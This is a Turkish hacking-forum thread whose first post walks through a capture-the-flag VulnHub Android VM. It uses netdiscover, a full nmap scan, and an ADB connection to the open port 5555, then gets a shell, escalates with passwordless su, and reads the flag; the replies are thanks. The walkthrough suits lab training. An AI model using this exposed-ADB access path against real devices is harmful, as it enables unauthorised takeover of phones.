THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Açıklı Android Makine Çözümü // ch_arli41

ch_arli41 - ait Kullanıcı Resmi (Avatar)
Red Team Lideri
Üyelik tarihi:
07/2009
Mesajlar:
1.005
Konular:
72
Teşekkür (Etti):
695
Teşekkür (Aldı):
720
Ticaret:
(0) %
01-12-2018 18:24
#1
Açıklı Android Makine Çözümü // ch_arli41
Bu yazımızda bir farklılık olsun dedim ve sizlere Android bir makinenin çözümü anlatmaya çalıştım. Umarım beğenirsiniz. Şimdi vakit kaybetmeden yazımıza geçelim. Aşağıdaki linkten makinemizi indirip sanallaştırma platformumuz üzerine kurlumumuzu yapıyoruz.

İndirme linki: https://www.vulnhub.com/entry/android4-1,233/







$netdiscover

Makinemizi sanallaştırdığımız ve aynı ağda olduğumuz için öncelikle IP adresini almamız lazım. Bunun içinde aynı ağdaki cihazların IP ve MAC adreslerini görmemizi sağlayan Netdiscover aracını kullanacağız. Aracımız eğer yüklü değilse şu şekilde kurabilirsiniz:

$sudo apt-get update
$sudo apt-get install netdiscover

Aracımızı şu komutla kullanabilirsiniz:

$netdiscover -i ağ_arayüzü


IP adresimizi netdiscover sayesinde öğrendik. Şimdi sıra geldi hedef hakkında bilgi toplamaya. Bunun için Nmap’i kullanacağız.






$nmap -p- -A ipadresi

Bu komut ile tüm portları inceliyoruz ve çekebileceğimiz sorgu çeşitlerinin tamamını Nmap’in çekmesini istiyoruz.

Çıktımızda 5555 portunu kullanan freeciv isimli oyun servisi dikkatimi çekiyor. Freeciv Android’de sıfırdan medeniyet kurma oyunlarından birisi. Bu portu testimiz için kullanabilir fakat bundan önce Android Debug Bridge (Android Ayıklama Köprüsü – adb) isimli script’ kurmamız lazım. Bu script android cihazları bilgisayarımız üzerinde kontrol etmemizi sağlayan bir script. Android’de kullanabileceğiniz çeşit çeşit komutu bu script ile bulabilirsiniz.




$apt-get install adb

Bu komut ile adb scriptini yukluyoruz.






$adb –help

Bu komut ile yardimci komutlara bakiyoruz.



$adb connect ipadresiort

Bu komut ile cihazimiza baglanti yapmis oluyoruz. Bağlantımızı yaptık fakat önümüze bir şey gelmedi. Endişelenmeyin işlemimizde bir hata yok sadece bağlantı yaparken shell istemedik. Şimdi servisten shellimizi isteyelim.



adb shell

Bu komut ile shellimizi almış oluyoruz. Shellimizi aldık şimdi işlem yapabilmemiz için root olmamız gerekiyor. Tipik linux serverlarda olduğu gibi root yetkimizi almak için aşağıdaki komutu kullanıyoruz:



$su

su komutu ile root yetkisine yukseldik.Sifre olmadigi icin direk root yetkisine gecis yaptik.ls komutu ile bulundugumuz dizindeki dosyalari listeleyelim.

$ls



$cd data
$ls

cd komutu ile data klasorune gecis yaptik.ls komutu ile data klasorundeki dosyalari listeledik.



$cd root/
$ls

cd komutu ile root klasorune gecis yaptik ve ls komutu ile dosyalarımızı listeledik ve flag karşımızda. Cat komutu ile şimdi flag’ı bastırabiliriz.

$cat flag.txt





Okuduğunuz için teşekkürler.
---------------------
Konu Baysal tarafından (09-01-2019 20:47 Saat 20:47 ) değiştirilmiştir.
'Flash - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2017
Nereden:
røøt@:~#
Mesajlar:
821
Konular:
30
Teşekkür (Etti):
1254
Teşekkür (Aldı):
219
Ticaret:
(0) %
09-01-2019 23:34
#2
Ellerinize Sağlık Hocam.
---------------------
Elbet bir gün.
Epesus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2016
Nereden:
Boşver !
Yaş:
21
Mesajlar:
653
Konular:
120
Teşekkür (Etti):
1350
Teşekkür (Aldı):
270
Ticaret:
(0) %
09-01-2019 23:37
#3
Eline sağlık abi gene döktürmüşsün
---------------------
ཌ 𝔢𝔭𝔢𝔰𝔲𝔰 𝔦𝔰𝔱𝔦𝔥𝔟𝔞𝔯𝔞𝔱 𝔱𝔦𝔪𝔦 ད
EsghaL - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2018
Nereden:
İst.Ülkü.Ock
Yaş:
6
Mesajlar:
290
Konular:
20
Teşekkür (Etti):
29
Teşekkür (Aldı):
67
Ticaret:
(0) %
09-01-2019 23:45
#4
elinize sağlık kaydettim
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
09/2016
Mesajlar:
5.017
Konular:
463
Teşekkür (Etti):
83
Teşekkür (Aldı):
1542
Ticaret:
(0) %
11-01-2019 22:04
#5
Eline, emeğine sağlık.
Ademhackpro - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Nereden:
Başarılı.
Mesajlar:
538
Konular:
67
Teşekkür (Etti):
64
Teşekkür (Aldı):
62
Ticaret:
(0) %
11-01-2019 22:32
#6
Eline saglik
--------------------- HACKED BY THT
NAME: ADEM
ByQueny - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Bilinmiyor
Mesajlar:
663
Konular:
16
Teşekkür (Etti):
18
Teşekkür (Aldı):
72
Ticaret:
(0) %
11-01-2019 22:40
#7
eline sağlık emek var
---------------------
Ben Yapmaya Cesaret Edemediğin Herşeyin Vücut Bulmuş Haliyim .

Cyber Security & Defacer
s4bb4H - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
loneliness
Mesajlar:
119
Konular:
13
Teşekkür (Etti):
14
Teşekkür (Aldı):
18
Ticaret:
(0) %
11-01-2019 22:41
#8
Eline sağlık...
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Red Team Lideri
Üyelik tarihi:
07/2009
Mesajlar:
1.005
Konular:
72
Teşekkür (Etti):
695
Teşekkür (Aldı):
720
Ticaret:
(0) %
11-01-2019 23:50
#9
Alıntı:
TheFlashTR´isimli üyeden Alıntı Mesajı göster
Ellerinize Sağlık Hocam.
Alıntı:
Epesus´isimli üyeden Alıntı Mesajı göster
Eline sağlık abi gene döktürmüşsün

Alıntı:
XenopLes´isimli üyeden Alıntı Mesajı göster
elinize sağlık kaydettim
Alıntı:
Ademhackpro´isimli üyeden Alıntı Mesajı göster
Eline saglik
Alıntı:
ByQueny´isimli üyeden Alıntı Mesajı göster
eline sağlık emek var
Alıntı:
s4bb4H´isimli üyeden Alıntı Mesajı göster
Eline sağlık...
Teşekkür ederim.


Alıntı:
SeNZeRo´isimli üyeden Alıntı Mesajı göster
Eline, emeğine sağlık.
Teşekkür ederim komutanım.
---------------------
kralfelix Teşekkür etti.
'T0YB0X - ait Kullanıcı Resmi (Avatar)
Siber Güvenlik Kulübü
Üyelik tarihi:
01/2017
Nereden:
Bursa
Mesajlar:
621
Konular:
64
Teşekkür (Etti):
245
Teşekkür (Aldı):
143
Ticaret:
(0) %
12-01-2019 00:59
#10
Ellerine sağlık abi. Yararlı bir konu olmuş.
---------------------


Vatan Şeref




Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler